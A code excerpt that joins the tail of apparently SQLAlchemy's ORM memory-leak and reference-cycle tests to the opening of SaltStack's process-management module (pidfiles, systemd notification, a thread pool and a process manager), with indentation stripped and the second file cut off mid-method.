B, cascade="all, delete", order_by=table2.c.col1
)
},
)
m2 = self.mapper_registry.map_imperatively(B, table2)
@profile_memory()
def go():
with Session(self.engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
go()
metadata.drop_all(self.engine)
del m1, m2
assert_no_mappers()
def test_sessionmaker(self):
@profile_memory()
def go():
sessmaker = sessionmaker(bind=self.engine)
sess = sessmaker()
r = sess.execute(select(1))
r.close()
sess.close()
del sess
del sessmaker
go()
@testing.emits_warning("Compiled statement cache for mapper.*")
@testing.emits_warning("Compiled statement cache for lazy loader.*")
@testing.crashes("sqlite", ":memory: connection not suitable here")
def test_orm_many_engines(self):
metadata = MetaData(self.engine)
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all()
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
_compiled_cache_size=50,
)
m2 = self.mapper_registry.map_imperatively(
B, table2, _compiled_cache_size=50
)
@profile_memory()
def go():
engine = engines.testing_engine(
options={
"logging_name": "FOO",
"pool_logging_name": "BAR",
"use_reaper": False,
}
)
with Session(engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
engine.dispose()
go()
metadata.drop_all()
del m1, m2
assert_no_mappers()
@testing.emits_warning("Compiled statement cache for.*")
def test_many_updates(self):
metadata = MetaData()
wide_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
*[Column("col%d" % i, Integer) for i in range(10)]
)
class Wide:
pass
self.mapper_registry.map_imperatively(
Wide, wide_table, _compiled_cache_size=10
)
metadata.create_all(self.engine)
with Session(self.engine) as session:
w1 = Wide()
session.add(w1)
session.commit()
del session
counter = [1]
@profile_memory()
def go():
with Session(self.engine) as session:
w1 = session.query(Wide).first()
x = counter[0]
dec = 10
while dec > 0:
# trying to count in binary here,
# works enough to trip the test case
if pow(2, dec) < x:
setattr(w1, "col%d" % dec, counter[0])
x -= pow(2, dec)
dec -= 1
session.commit()
counter[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.requires.savepoints
def test_savepoints(self):
metadata = MetaData()
some_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
class SomeClass:
pass
self.mapper_registry.map_imperatively(SomeClass, some_table)
metadata.create_all(self.engine)
with Session(self.engine) as session:
target_strings = (
session.connection().dialect.identifier_preparer._strings
)
@profile_memory(
assert_no_sessions=False,
get_num_objects=lambda: len(target_strings),
)
def go():
with Session(self.engine) as session, session.begin():
sc = SomeClass()
session.add(sc)
with session.begin_nested():
session.query(SomeClass).first()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_unicode_warnings(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", Unicode(30)),
)
metadata.create_all(self.engine)
i = [1]
# the iteration count here is cranked way up so that we can see
# pysqlite clearing out its internal buffer and allow
# the test to pass
@testing.emits_warning()
@profile_memory()
def go():
# execute with a non-unicode object. a warning is emitted,
# this warning shouldn't clog up memory.
with self.engine.connect() as conn:
conn.execute(
table1.select().where(table1.c.col2 == "foo%d" % i[0])
)
i[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
def test_warnings_util(self):
counter = itertools.count()
import warnings
warnings.filterwarnings("ignore", "memusage warning.*")
@profile_memory()
def go():
util.warn_limited(
"memusage warning, param1: %s, param2: %s",
(next(counter), next(counter)),
)
go()
def test_mapper_reset(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
@profile_memory()
def go():
self.mapper_registry.map_imperatively(
A,
table1,
properties={"bs": relationship(B, order_by=table2.c.col1)},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.flush()
sess.close()
clear_mappers()
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_alias_pathing(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("bid", Integer, ForeignKey("b.id")),
Column("type", String(30)),
)
asub = Table(
"asub",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
Column("data", String(30)),
)
b = Table(
"b",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
self.mapper_registry.map_imperatively(
A, a, polymorphic_identity="a", polymorphic_on=a.c.type
)
self.mapper_registry.map_imperatively(
ASub, asub, inherits=A, polymorphic_identity="asub"
)
self.mapper_registry.map_imperatively(
B, b, properties={"as_": relationship(A)}
)
metadata.create_all(self.engine)
sess = Session(self.engine)
a1 = ASub(data="a1")
a2 = ASub(data="a2")
a3 = ASub(data="a3")
b1 = B(as_=[a1, a2, a3])
sess.add(b1)
sess.commit()
del sess
# sqlite has a slow enough growth here
# that we have to run it more times to see the
# "dip" again
@profile_memory(maxtimes=120)
def go():
sess = Session(self.engine)
sess.query(B).options(subqueryload(B.as_.of_type(ASub))).all()
sess.close()
del sess
try:
go()
finally:
metadata.drop_all(self.engine)
clear_mappers()
def test_path_registry(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Column("bar", Integer),
)
b = Table(
"b",
metadata,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
m1 = self.mapper_registry.map_imperatively(
A, a, properties={"bs": relationship(B)}
)
self.mapper_registry.map_imperatively(B, b)
@profile_memory()
def go():
ma = sa.inspect(aliased(A))
m1._path_registry[m1.attrs.bs][ma][m1.attrs.bar]
go()
clear_mappers()
def test_with_inheritance(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
ForeignKey("mytable.col1"),
primary_key=True,
test_needs_autoincrement=True,
),
Column("col3", String(30)),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(A):
pass
clear_mappers()
self.mapper_registry.map_imperatively(
A,
table1,
polymorphic_on=table1.c.col2,
polymorphic_identity="a",
)
self.mapper_registry.map_imperatively(
B, table2, inherits=A, polymorphic_identity="b"
)
sess = Session(self.engine, autoflush=False)
a1 = A()
a2 = A()
b1 = B(col3="b1")
b2 = B(col3="b2")
for x in [a1, a2, b1, b2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(), A(), B(col3="b1"), B(col3="b2")], alist)
for a in alist:
sess.delete(a)
sess.flush()
# don't need to clear_mappers()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_with_manytomany(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table3 = Table(
"t1tot2",
metadata,
Column("t1", Integer, ForeignKey("mytable.col1")),
Column("t2", Integer, ForeignKey("mytable2.col1")),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, secondary=table3, backref="as", order_by=table3.c.t1
)
},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
b1 = B(col2="b1")
b2 = B(col2="b2")
a1.bs.append(b1)
a2.bs.append(b2)
for x in [a1, a2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(bs=[B(col2="b1")]), A(bs=[B(col2="b2")])], alist)
for a in alist:
sess.delete(a)
sess.flush()
# mappers necessarily find themselves in the compiled cache,
# so to allow them to be GC'ed clear out the cache
self.engine.clear_compiled_cache()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_many_discarded_relationships(self):
"""a use case that really isn't supported, nonetheless we can
guard against memleaks here so why not"""
m1 = MetaData()
t1 = Table("t1", m1, Column("id", Integer, primary_key=True))
t2 = Table(
"t2",
m1,
Column("id", Integer, primary_key=True),
Column("t1id", ForeignKey("t1.id")),
)
class T1:
pass
t1_mapper = self.mapper_registry.map_imperatively(T1, t1)
@testing.emits_warning()
@profile_memory()
def go():
class T2:
pass
t2_mapper = self.mapper_registry.map_imperatively(T2, t2)
t1_mapper.add_property("bar", relationship(t2_mapper))
s1 = Session(testing.db)
# this causes the path_registry to be invoked
s1.query(t1_mapper)._compile_context()
go()
# fails on newer versions of pysqlite due to unusual memory behavior
# in pysqlite itself. background at:
# https://thread.gmane.org/gmane.comp.python.db.pysqlite.user/2290
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache_deprecated_coercion(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select()
sess = session()
with testing.expect_deprecated(
"Implicit coercion of SELECT and " "textual SELECT constructs"
):
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = aliased(Bar, table2.select().subquery())
sess = session()
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
class CycleTest(_fixtures.FixtureTest):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
cls._setup_stock_mapping()
def test_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).all()
go()
def test_session_execute_orm(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
stmt = select(User)
s.execute(stmt)
go()
def test_cache_key(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
stmt = select(User)
stmt._generate_cache_key()
go()
def test_proxied_attribute(self):
from sqlalchemy.ext import hybrid
users = self.tables.users
class Foo:
@hybrid.hybrid_property
def user_name(self):
return self.name
self.mapper_registry.map_imperatively(Foo, users)
# unfortunately there's a lot of cycles with an aliased()
# for now, however calling upon clause_element does not seem
# to make it worse which is what this was looking to test
@assert_cycles(69)
def go():
a1 = aliased(Foo)
a1.user_name.__clause_element__()
go()
def test_raise_from(self):
@assert_cycles()
def go():
try:
try:
raise KeyError("foo")
except KeyError as ke:
util.raise_(Exception("oops"), from_=ke)
except Exception as err: # noqa
pass
go()
def test_query_alias(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
u1 = aliased(User)
@assert_cycles()
def go():
s.query(u1).all()
go()
def test_entity_path_w_aliased(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)._path_registry[User.addresses.property]
go()
def test_orm_objects_from_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
def generate():
objects = s.query(User).filter(User.id == 7).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_orm_objects_from_query_w_selectinload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(selectinload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_selectinload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
selectinload(User.addresses)
go()
def test_selectinload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
Load(User).selectinload(User.addresses)
go()
def test_orm_path(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
inspect(User)._path_registry[User.addresses.property][
inspect(Address)
]
go()
def test_joinedload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
joinedload(User.addresses)
go()
def test_joinedload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
l1 = Load(User).joinedload(User.addresses)
l1._generate_cache_key()
go()
def test_orm_objects_from_query_w_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(joinedload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_query_filtered(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).filter(User.id == 7).all()
go()
def test_query_joins(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(4)
def go():
s.query(User).join(User.addresses).all()
go()
def test_query_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
s.query(User).options(joinedload(User.addresses)).all()
# cycles here are due to ClauseElement._cloned_set and Load.context,
# others as of cache key. The orm.instances() function now calls
# dispose() on both the context and the compiled state to try
# to reduce these cycles.
@assert_cycles(18)
def go():
generate()
go()
def test_plain_join(self):
users, addresses = self.tables("users", "addresses")
@assert_cycles()
def go():
str(users.join(addresses).compile(testing.db))
go()
def test_plain_join_select(self):
users, addresses = self.tables("users", "addresses")
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(7)
def go():
s = select(users).select_from(users.join(addresses))
state = s._compile_state_factory(s, s.compile(testing.db))
state.froms
go()
def test_orm_join(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
str(orm_join(User, Address, User.addresses).compile(testing.db))
go()
def test_join_via_query_relationship(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(User.addresses)
go()
def test_join_via_query_to_entity(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(Address)
go()
def test_result_fetchone(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.connection(mapper=User).execute(stmt)
while True:
row = result.fetchone()
if row is None:
break
go()
def test_result_fetchall(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
rows = result.fetchall() # noqa
go()
def test_result_fetchmany(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.partitions(3):
pass
go()
def test_result_fetchmany_unique(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.unique().partitions(3):
pass
go()
def test_core_select_from_orm_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
# ORM query using future select for .statement is adding
# some ORMJoin cycles here during compilation. not worth trying to
# find it
@assert_cycles(4)
def go():
s.execute(stmt)
go()
def test_adapt_statement_replacement_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
replacement_traverse(statement, {}, lambda x: None)
go()
def test_adapt_statement_cloned_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
cloned_traverse(statement, {}, {})
go()
def test_column_adapter_lookup(self):
User, Address = self.classes("User", "Address")
u1 = aliased(User)
@assert_cycles()
def go():
adapter = sql_util.ColumnAdapter(inspect(u1).selectable)
adapter.columns[User.id]
go()
def test_orm_aliased(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)
go()
@testing.fails()
def test_the_counter(self):
@assert_cycles()
def go():
x = []
x.append(x)
go()
def test_weak_sequence(self):
class Foo:
pass
f = Foo()
@assert_cycles()
def go():
util.WeakSequence([f])
go()
@testing.provide_metadata
def test_optimized_get(self):
Base = declarative_base(metadata=self.metadata)
class Employee(Base):
__tablename__ = "employee"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(10))
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Employee):
__tablename__ = " engineer"
id = Column(ForeignKey("employee.id"), primary_key=True)
engineer_name = Column(String(50))
__mapper_args__ = {"polymorphic_identity": "engineer"}
Base.metadata.create_all(testing.db)
s = Session(testing.db)
s.add(Engineer(engineer_name="wally"))
s.commit()
s.close()
@assert_cycles()
def go():
e1 = s.query(Employee).first()
e1.engineer_name
go()
def test_visit_binary_product(self):
a, b, q, e, f, j, r = [column(chr_) for chr_ in "abqefjr"]
from sqlalchemy import and_, func
from sqlalchemy.sql.util import visit_binary_product
expr = and_((a + b) == q + func.sum(e + f), j == r)
def visit(expr, left, right):
pass
@assert_cycles()
def go():
visit_binary_product(visit, expr)
go()
def test_session_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.close()
go()
def test_session_commit_rollback(self):
# this is enabled by #5074
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.commit()
go()
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.rollback()
go()
def test_session_multi_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
assert s._transaction is None
s.connection()
s.close()
assert s._transaction is None
s.connection()
assert s._transaction is not None
s.close()
go()
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
import salt.defaults.exitcodes
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
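# Example (sketch): the pidfile helpers above combine with os_is_running() to
# test whether a previously started daemon is still alive. 'pidfile' here is a
# hypothetical path, not something defined in this module:
#
#   if check_pidfile(pidfile) and os_is_running(get_pidfile(pidfile)):
#       log.debug('daemon already running')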
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now, this implementation
only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` attribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
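# Example (sketch): fire-and-forget work onto the pool. fire_async() returns
# False when the bounded job queue is full, so the caller can decide whether
# to drop or retry the work item. The callable passed here is only
# illustrative:
#
#   pool = ThreadPool(num_threads=4, queue_size=100)
#   if not pool.fire_async(log.debug, args=['work item picked up by the pool']):
#       log.debug('thread pool queue full, work item dropped')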
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
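# Typical usage (sketch, not part of the original module): each target is
# wrapped in a multiprocessing.Process, started, and restarted if it dies.
# 'worker_func' and 'opts' are hypothetical names:
#
#   manager = ProcessManager(name='MyDaemon')
#   manager.add_process(worker_func, args=[opts])
#   manager.run()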
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a process with args + kwargs
This will determine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
if self._restart_processes is False:
return
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if (salt.utils.is_windows() and
signal_ in (signal.SIGTERM, signal.SIGINT)):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
